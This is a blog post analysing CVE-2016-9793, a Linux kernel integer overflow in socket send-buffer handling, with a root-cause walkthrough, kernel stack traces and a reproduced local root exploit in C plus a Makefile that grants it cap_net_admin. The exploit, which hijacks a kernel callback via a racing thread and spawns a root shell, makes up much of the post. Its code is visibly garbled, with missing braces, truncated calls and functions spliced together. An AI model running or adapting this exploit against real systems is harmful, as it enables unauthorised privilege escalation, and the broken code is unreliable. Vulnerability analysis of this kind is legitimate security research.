Analysis on CVE-2016-9793


This is an integer overflow vulnerability in the Linux kernel. The exploit code can be found at [1]. This post mainly discusses the root cause of this CVE and how the exploit works.

Root Cause Analysis

		sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
		sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
                /* val is an input from user space, sk_sndbuf is an int type*/
		/* Wake up sending tasks if we upped the value. */

/*
 * max_t(type, x, y): convert both x and y to `type`, then yield the larger.
 * Each argument is evaluated exactly once into a temporary of that type, so
 * the comparison is carried out in `type` whatever the operands' own types
 * are; with an unsigned `type`, a negative argument is converted to a large
 * unsigned value before it is compared.
 * The ({ ... }) form is a statement expression: its value is that of the
 * last expression inside it.
 */
#define max_t(type, x, y) ({			\
	type __max1 = (x);			\
	type __max2 = (y);			\
	__max1 > __max2 ? __max1 : __max2; })

In the code above, sk_sndbuf is of type int, but the u32 result of max_t() is assigned to it. An attacker can therefore pass a very large unsigned value as val so that sk_sndbuf becomes a negative number.

Exploit Analysis


//Tested on Ubuntu 14.04 with Linux-4.2.0
#define _GNU_SOURCE

#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>

#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Hard-coded addresses that are cast to function pointers below.
 * NOTE(review): presumably the addresses of the kernel's commit_creds() and
 * prepare_kernel_cred() on the tested kernel build; they would have to be
 * replaced for any other kernel image -- confirm against the target.
 * The commented-out values after each define look like the addresses for a
 * different build.
 */
#define COMMIT_CREDS 0xffffffff81096d90//0xffffffff81079860ul
#define PREPARE_KERNEL_CRED 0xffffffff81097080//0xffffffff81079b20ul

/* Function-pointer types through which the two addresses above are called. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/* Callable handles: the fixed addresses cast to the types declared above. */
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root(void) {

/*
 * Debugging pause: print `count` as a checkpoint marker, then block until an
 * integer is entered on stdin.
 *
 * Returns the integer that was read, or -1 when stdin yields no integer
 * (EOF or non-numeric input).
 */
int halt(int count){
	int x;

	printf("%d\n", count);
	/* scanf() stores into x only when the conversion succeeds. */
	if (scanf("%d", &x) != 1) {
		return -1;
	}
	return x;
}

/*
 * Userspace mirror of the kernel's struct ubuf_info; the trailing comment on
 * each field gives the kernel-side type it stands in for. Every field is
 * stored as a 64-bit integer. `callback` is the function pointer that
 * skb_release_data() invokes as uarg->callback(uarg, true).
 */
struct ubuf_info_t {
  uint64_t callback;        // void (*callback)(struct ubuf_info *, bool)
  uint64_t ctx;             // void *
  uint64_t desc;            // unsigned long
};

/*
 * Userspace mirror of the kernel's struct skb_shared_info; the trailing
 * comment on each field gives the kernel-side type it stands in for.
 * The exploit only writes `tx_flags` and `destructor_arg`; the remaining
 * fields are present so that those two land at the right offsets.
 * NOTE(review): the layout is assumed to match the tested kernel build
 * (x86-64); verify offsets against the target kernel.
 */
struct skb_shared_info_t {
  uint8_t  nr_frags;        // unsigned char
  uint8_t  tx_flags;        // __u8
  uint16_t gso_size;        // unsigned short
  uint16_t gso_segs;        // unsigned short
  uint16_t gso_type;        // unsigned short
  uint64_t frag_list;       // struct sk_buff *
  uint64_t hwtstamps;       // struct skb_shared_hwtstamps
  uint32_t tskey;           // u32
  uint32_t ip6_frag_id;     // __be32
  uint32_t dataref;         // atomic_t
  uint64_t destructor_arg;  // void *
  uint8_t  frags[16][17];   // skb_frag_t frags[MAX_SKB_FRAGS];
};

// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
// SNDBUF is the value main() passes to setsockopt(); SHINFO is the userspace
// address at which the fake skb_shared_info is placed (main() mmaps the page
// containing it).
#define SNDBUF 0xffffff00
#define SHINFO 0x00000000fffffed0ul

// Fake ubuf_info whose callback field holds the address of get_root().
struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
// Alternative with a recognisable bogus callback address (the value that
// appears as frame #0 in the stack trace shown in this post).
//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
// Typed view of the SHINFO address; skb_thr() writes through this pointer.
struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;

#define SKBTX_DEV_ZEROCOPY (1 << 3) void* skb_thr(void* arg) { 	while (1) { 		skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
		skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;

int sockets[2];

void *write_thr(void *arg) {
	// Write blocks until setsockopt(SO_SNDBUF).
	write(sockets[1], "\x5c", 1);

	if (getuid() == 0) {
		printf("[+] got r00t\n");
		execl("/bin/bash", "bash", NULL);
	printf("[-] something went wrong\n");

int main() {
	void *addr;
	int rv;
	uint32_t sndbuf;

	addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,
		-1, 0);
	if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {

	printf("[.] userspace payload mmapped at %p\n", addr);

 	pthread_t skb_th;
    	rv = pthread_create(&skb_th, 0, skb_thr, NULL);
	if (rv != 0) {

	printf("[.] overwriting thread started\n");

	rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
	if (rv != 0) {

	printf("[.] sockets opened\n");

	sndbuf = SNDBUF;
	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
			&sndbuf, sizeof(sndbuf));
	if (rv != 0) {

	printf("[.] sock->sk_sndbuf set to %x, %d\n", SNDBUF * 2, SNDBUF*2);
	pthread_t write_th;
	rv = pthread_create(&write_th, 0, write_thr, NULL);
	if (rv != 0) {

	printf("[.] writing to socket\n");

	// Wake up blocked write.
	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
			&sndbuf, sizeof(sndbuf));
	if (rv != 0) {


	return 0;


# Builds the proof-of-concept as a static binary and grants it CAP_NET_ADMIN
# (SO_SNDBUFFORCE, which the exploit uses, requires that capability; see
# socket(7)).
# Recipe lines must start with a TAB character.
# The first variable is named CFLAGS because that is what the poc recipe
# expands; under the name FLAGS, -static was never passed to the compiler.
CFLAGS := -static
LFLAGS := -lutil -lpthread
ALL := poc

all: $(ALL)

poc: poc.c
	$(CC) $(CFLAGS) -o $@ $< $(LFLAGS)
	sudo setcap cap_net_admin+ep $(ALL)

clean:
	rm -rf $(ALL)

.PHONY: all clean

And the final exploit looks like the following:

Exploit Procedure

Here we explain how control flow is finally hijacked. First, here is the stack trace obtained when the function pointer is set to 0xffffdeaddeadbeef.

#0  0xffffdeaddeadbeef in ?? ()
#1  0xffffffff8168cf95 in skb_release_data (skb=0xffff880078c15100) at net/core/skbuff.c:594
#2  0xffffffff8168d008 in skb_release_all (skb=0xffff880078c15100) at net/core/skbuff.c:659
#3  0xffffffff8168d076 in __kfree_skb (skb=<optimized out>) at net/core/skbuff.c:673
#4  kfree_skb (skb=0xffff880078c15100) at net/core/skbuff.c:694
#5  0xffffffff8173d5d5 in unix_stream_sendmsg (sock=<optimized out>, msg=<optimized out>, len=<optimized out>) at net/unix/af_unix.c:1704
#6  0xffffffff81685128 in sock_sendmsg_nosec (msg=<optimized out>, sock=<optimized out>) at net/socket.c:610
#7  sock_sendmsg (sock=0xffff8800785a9180, msg=0xffff880078cb7dc0) at net/socket.c:620
#8  0xffffffff816851b8 in sock_write_iter (iocb=<optimized out>, from=0xffff880078cb7e70) at net/socket.c:819
#9  0xffffffff811e94d7 in new_sync_write (ppos=<optimized out>, len=<optimized out>, buf=<optimized out>, filp=<optimized out>) at fs/read_write.c:478
#10 __vfs_write (file=0xffff88007a61e400, p=<optimized out>, count=<optimized out>, pos=0xffff880078cb7f20) at fs/read_write.c:491
#11 0xffffffff811e9b39 in vfs_write (file=0x6020b0, buf=0x400cc8 "\\", count=<optimized out>, pos=0xffff880078cb7f20) at fs/read_write.c:538
#12 0xffffffff811ea8a6 in SYSC_write (count=<optimized out>, buf=<optimized out>, fd=<optimized out>) at fs/read_write.c:585
#13 SyS_write (fd=<optimized out>, buf=4197576, count=1) at fs/read_write.c:577
#14 0xffffffff817a8c72 in entry_SYSCALL_64_fastpath () at arch/x86/entry/entry_64.S:186

Based on this stack trace, I reviewed the source code backward, starting from lines 1672-1702 of net/unix/af_unix.c.

size = len - sent;

/* Keep two messages in the pipe so it schedules better */
/* size is overwritten with a negative value here */
size = min_t(int, size, (sk->sk_sndbuf >> 1) - 64);

/* allow fallback to order-0 allocations */
size = min_t(int, size, SKB_MAX_HEAD(0) + UNIX_SKB_FRAGS_SZ);

data_len = max_t(int, 0, size - SKB_MAX_HEAD(0));

data_len = min_t(size_t, size, PAGE_ALIGN(data_len));
/* sk->sk_sndbuf is 0xfffffe00(-512), size is 0xfffffec0(-320), data_len is 0*/
skb = sock_alloc_send_pskb(sk, size - data_len, data_len,
			msg->msg_flags & MSG_DONTWAIT, &err,
if (!skb)
	goto out_err;

/* Only send the fds in the first buffer */
err = unix_scm_to_skb(&scm, skb, !fds_sent);
if (err < 0) {
	goto out_err;
max_level = err + 1;
fds_sent = true;

skb_put(skb, size - data_len);
skb->data_len = data_len;
skb->len = size;
err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, size);
if (err) {   //line 1703
	goto out_err;

The final callsite that triggers control flow hijacking takes place in skb_release_data in net/core/skbuff.c.

static void skb_release_data(struct sk_buff *skb)
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

	if (skb->cloned &&
	    atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,

	for (i = 0; i < shinfo->nr_frags; i++)

	 * If skb buf is from userspace, we need to notify the caller
	 * the lower device DMA has done;
	if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
		struct ubuf_info *uarg;

		uarg = shinfo->destructor_arg;
		if (uarg->callback)
			uarg->callback(uarg, true);  // hijack control flow to 0xfffffce0

	if (shinfo->frag_list)


After the values in size and data_len have been overwritten with attacker-controlled data, control flow enters sock_alloc_send_pskb (below) to set up the sk_buff. The allocation proceeds as follows:

sock_alloc_send_pskb(sk, 0xfffffec0, 0, ...)
|---alloc_skb_with_frags(0xfffffec0, 0, ...)
----|----alloc_skb(0xfffffec0, gfp_head)
---------|----__alloc_skb(0xfffffec0, ...)
--------------|----data = kmalloc_reserve(0xfffffec0, ...)
// allocation fail, the return value of alloc is NULL,
// return value of kmalloc_reserve is 0x10
--------------|----skb->head = data;
--------------|----skb->data = data;
--------------|----skb_reset_tail_pointer(skb);  //skb->tail is set 0xfffffec0
--------------|----skb->end = skb->tail + size;  //skb->end is set 0xfffffec0
//The final result for struct sk_buff skb* is
(gdb) p *(struct sk_buff*)( 0xffff88007a33a900)$2 = {headers_end = 0xffff88007a33a9c8, tail = 4294966976, end = 4294966976, head = 0x10 <irq_stack_union+16>, data = 0x10}

Another thing to note is that the exploit creates a thread that repeatedly overwrites member variables of the crafted skb_shared_info. That is because of the code below:

shinfo = skb_shinfo(skb);
memset(shinfo, 0, offsetof(struct skb_shared_info, dataref));
atomic_set(&shinfo->dataref, 1);

After the allocation fails, the data in shinfo is reset to 0. The attacker therefore needs to win a race condition here to write the desired values back into the crafted object.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s